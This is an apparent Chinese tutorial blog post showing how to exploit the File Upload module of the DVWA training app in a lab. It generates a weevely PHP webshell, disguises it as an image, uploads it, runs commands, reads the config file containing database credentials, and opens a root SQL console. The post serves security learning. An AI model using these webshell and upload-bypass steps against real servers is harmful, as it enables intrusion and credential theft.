文件上传漏洞利用工具weevely - 安全工具篇

新手指南：DVWA-1.9全级别教程之File Upload ，亲测PHP7下，中国菜刀无果。所以，这里介绍weevely。

直接上命令，生成webshell：

➜  ~ weevely generate  weevely hello.php
➜  ~ cd /usr/share/weevely
➜  ~ mv hello.php hello.png

拦截请求

修改文件名后上传

and 继续weevely

?  weevely weevely http://192.168.56.101/DVWA/hackable/uploads/hello.php  weevely

[+] weevely 3.7.0

[+] Target: 192.168.56.101
[+] Session:    /root/.weevely/sessions/192.168.56.101/hello_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> dir
 ???? D ?????±???
 ??????C022-AA4B

 D:\xampp\htdocs\DVWA\hackable\uploads ????

2019-04-22  20:50    <DIR>          .
2019-04-22  20:50    <DIR>          ..
2019-04-22  18:03                32 1.php
2019-04-22  16:14                31 1.php%00.png
2019-02-06  16:11               667 dvwa_email.png
2019-04-22  20:46            17,919 hack.png
2019-04-22  20:50               698 hello.php
2019-04-22  20:21            17,220 ?±¨.png
               6 ????         36,567 ??
               2 ???? 145,805,955,072 ???? 
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ whoami
cn\majx2

到这，已经拿到webshell啦~ 继续~

majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ cd ../../config
majx2704:D:\xampp\htdocs\DVWA\config $ dir
 Ƚ¶¯Ƿ D אµľԐ±뇩¡£
 ¾�ѲºƊŠC022-AA4B

 D:\xampp\htdocs\DVWA\config µń¿¼

2019-04-15  15:11    <DIR>          .
2019-04-15  15:11    <DIR>          ..
2019-04-22  10:00             1,930 config.inc.php
2019-04-16  21:49             1,924 config.inc.php.bak
2019-02-06  16:11             1,857 config.inc.php.dist
               3 ¸󏄼þ          5,711 ؖ½
               2 ¸󅀂¼ 145,788,071,936 ¿ʓėֽ 
majx2704:D:\xampp\htdocs\DVWA\config $ type config.inc.php
<?php

# If you are having problems connecting to the MySQL database and all of the variables below are correct
# try changing the 'db_server' variable from localhost to 127.0.0.1. Fixes a problem due to sockets.
#   Thanks to @digininja for the fix.

# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL'; // Currently disabled

# Database variables
#   WARNING: The database specified under db_database WILL BE ENTIRELY DELETED during setup.
#   Please use a database dedicated to DVWA.
#
# If you are using MariaDB then you cannot use root, you must use create a dedicated DVWA user.
#   See README.md for more information on this.
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = '123456';

# Only used with PostgreSQL/PGSQL database selection.
$_DVWA[ 'db_port '] = '3306';

# ReCAPTCHA settings
#   Used for the 'Insecure CAPTCHA' module
#   You'll need to generate your own keys at: https://www.google.com/recaptcha/admin
$_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';

# Default security level
#   Default value for the secuirty level with each session.
#   The default is 'impossible'. You may wish to set this to either 'low', 'medium', 'high' or impossible'.
$_DVWA[ 'default_security_level' ] = 'high';

# Default PHPIDS status
#   PHPIDS status with each session.
#   The default is 'disabled'. You can set this to be either 'enabled' or 'disabled'.
$_DVWA[ 'default_phpids_level' ] = 'disabled';

# Verbose PHPIDS messages
#   Enabling this will show why the WAF blocked the request on the blocked request.
#   The default is 'disabled'. You can set this to be either 'true' or 'false'.
$_DVWA[ 'default_phpids_verbose' ] = 'false';

?>
majx2704:D:\xampp\htdocs\DVWA\hackable\uploads $ :sql_console  -host 127.0.0.1 -user root -passwd 123456 
root@localhost SQL> select user()
 
+----------------+
| root@localhost |
+----------------+

还有很多功能，主要针对linux平台的。可以通过--help进行查看。
The End !

最后编辑于：2019.04.23 08:58:14